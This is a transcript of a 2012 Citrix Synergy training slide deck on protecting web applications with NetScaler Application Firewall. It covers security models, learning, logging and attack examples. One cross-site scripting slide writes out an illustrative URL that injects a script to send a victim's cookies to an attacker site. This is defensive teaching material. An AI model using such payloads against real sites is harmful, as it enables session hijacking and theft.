Protect your data from web-based attacks with NetScaler Application Firewall Rónán O’Brien...
-
Upload
griffin-reynold-bond -
Category
Documents
-
view
218 -
download
0
Transcript of Protect your data from web-based attacks with NetScaler Application Firewall Rónán O’Brien...
Protect your data from web-based attacks with NetScaler Application Firewall
Rónán O’BrienSenior Support Readiness
May 2012
2#CitrixSynergy
• Application Firewalls
• Security Models
• Application Firewall Wizard
• Attack Examples
• Learning
• Logging
• Deployment checklist
Agenda
Application Firewalls
4#CitrixSynergy
• Application implies Layer 7
• Not to be confused with Network Firewalls
• Application Firewalls Vs Deep Packet Inspection (DPI)
• SSL Offload
• XML Aware
• Payment Card Industry Data Security Standards (PCI-DSS)
Application Firewalls
5#CitrixSynergy
us-cert.gov
• Some vulnerability and attack reports
can be found on www.us-cert.com
• Operational arm of the National Cyber
Security Division (NCSD) at the
Department of Homeland Security
(DHS).
6#CitrixSynergy
Application Firewall citrix.com site
7#CitrixSynergy
Traffic Flow Architecture
Vserver ASNIP
VIP
Server1 IP
Server2 IP
Server3 IP
Client IP
8#CitrixSynergy
Lab Structure
• Self contained labs – cloud hosted.
• Go to http://training.citrixsynergy.net and enter the course code and your
business e-mail address.
• Course code: SanFran
9#CitrixSynergy
Lab Structure
• Click to open Web Interface,
where you can launch
published XenCenter
• The digital lab guide is here.
• Limited printed copies
available.
LABS 1 & 2
Security Models
12#CitrixSynergy
• Positive Security Model – allow only known good traffic
• Negative Security Model – block only known bad traffic
Security Models
13#CitrixSynergy
Security Models
• NetScaler provides both models
• Positive and Negative use
cases
• Signatures available for
download
• Learning makes positive
security model easier to
configure
14#CitrixSynergy
Application Firewall Actions - Blocking
• Request side block results in:
1. Redirect to root of the website (/) – default.
2. Redirect to a URL of your choice (relative or absolute)
3. Custom error page served from appliance
4. Transform
• Response side block results in:○ Termination of response○ X-Out of sensitive data.
15#CitrixSynergy
Application Firewall Actions - Logging
• Every block action will be logged.
• We can choose not to block, but still
log the violation.
• We can create ‘relaxations’ directly
from the logs.
• Logging is on the appliance, or can be sent to 3rd party.
• Logging is in Syslog format, and as of NetScaler 10 – CEF Format.
16#CitrixSynergy
Application Firewall Actions - Stat
• NetScaler AppFirewall will collect
stats on violations
• Reporting is on the appliance
• Reporting can be performed by 3rd party
also (e.g. Splunk or Citrix Command
Center).
17#CitrixSynergy
Application Firewall Actions - Learn
• NetScaler App Firewall built in
learning intelligence
• Creates Regex rule – so you don’t
have to!
• For scale (when thousands of
learned rules are presented), we use
the Visualizer.
Application Firewall Wizard
19#CitrixSynergy
• Can be used to modify configs previously created by the wizard.
• One stop shop for configuring
Application Firewall.
• Positive and Negative security
models.
• Deep Protections.
• Integrates also with Learning
Application Firewall Wizard
20#CitrixSynergy
Application Firewall Wizard
Lab 3 & 4
Attack Examples
23#CitrixSynergy
• Experienced internet\application users
• Predictable file system layout
• Lack of Web Server security (directory
browsing not disabled
• Reconnaissance
• Site may be used as attack platform (but
otherwise left untouched
Forceful Browsing
24#CitrixSynergy
URL Closure
WWW
<A Href="headline1.htm"><A Href="headline2.htm"><A Href="headline3.htm">
GET headline4.htmHost: newstimes.com
Lab 5
26#CitrixSynergy
SQL Injection
• Uses SQL logic and a vulnerable web form
to extract information from the database.
• Does not impact or violate the web server,
but results in unauthorised access to data.
• Adds an additional SQL command to a
non-validated form field.
27#CitrixSynergy
SQL Injection Custom Actions
• Violation action include allowing the request
continue after neutralising the attack.
• SQL comments can be used to get around
basic string scanning protection.
Lab 6
29#CitrixSynergy
Cross Site Scripting
• Tricking a browser into executing a malicious script.
• Can be dynamic or static.
Customer logs into onlinebank.com
Malicious user sends e-mail to customer with a HTTP link which user clicks on.http://www.onlinebank.com/login.jsp?name=<script>Send cookies to http://piratesite.net</script>
onlinebank.com cookies
Lab 7
31#CitrixSynergy
Application Vulnerability Scans
• Security companies offer an automated scan to test for known vulnerabilities.
• Scanning usually performed on continual basis as○ the application itself is changed\developed○ New attack methods & vulnerabilities are discovered.
• NetScaler Application Firewall understands the scan report & suggest the
necessary protections to close the security holes.
Lab 8
33#CitrixSynergy
Form Field Consistency
• Attack method: Client-side modification of form properties.
• Vulnerability: Client Input not validated.
• Result: Compromise of application logic.
• Hidden form elements (e.g. prices)
• Form structure – e.g. radio buttons, check boxes etc.
Lab 9
35#CitrixSynergy
Protecting Application Cookies
• Cookies are Web Application\Web Server identity tokens.
• Session vs Persistent
• Name value configuration
• Application Firewall Cookie ‘proactive’ Actions include
encrypting and proxying cookies (next).
• If cookie is tampered with, action is to block.
36#CitrixSynergy
Cookie Encryption & Decryption
Set-Cookie: user=bobSet-Cookie: user = KLJDG84NMRG
Cookie: user = KLJDG84NMRG Cookie: user=bob
37#CitrixSynergy
Cookie Proxying
Set-Cookie: user=bobSet-Cookie: access=limited
Set-Cookie: AppfwCookieJar=H77HFDSH908
Cookie: AppfwCookieJar=H77HFDSH908 Cookie: user=bobCookie: access=limited
Lab 10
Learning
40#CitrixSynergy
Learning
Learned data
• is used to create rules for the positive security model.
• can be exported to a CSV for analysis.
• is propagated in a HA pair of appliances.
• is stored in RegEx format.
• should not be left permanently turned on in production.
Lab 11
42#CitrixSynergy
HTML Comment Stripping
• Programming Comments
<!--This is a comment. Comments are not displayed in the browser
But may contain all sorts of temporary information -->
• Some scripts include comments:
<script type="text/javascript">
<!-- function displayMsg() {
alert("Hello World!") } //--> </script>
Lab 12
Deployment points to bear in mind
45#CitrixSynergy
• Sizing – look at the web application logs & response sizes.
• Decide which parts of the application need to be protected, and if it requires
different levels of protection.
• Some protections are more resource intensive than others
• Clever usage of policies and ACLs can allow only specific groups
access to the application to fill the learning DB with valid traffic patterns.
Before Turning on Application Firewall
#CitrixSynergy
Before you leave…
• Conference surveys are available online at www.citrixsummit.com starting Thursday, May 10○ Provide your feedback and pick up a complimentary gift at the registration desk
• Download presentations starting Monday, May 21, from your My Organizer tool located in your My Account
#CitrixSynergy
We value your feedback!Take a survey of this session now in the mobile app
• Click 'Sessions' button
• Click on today's tab
• Find this session
• Click 'Surveys'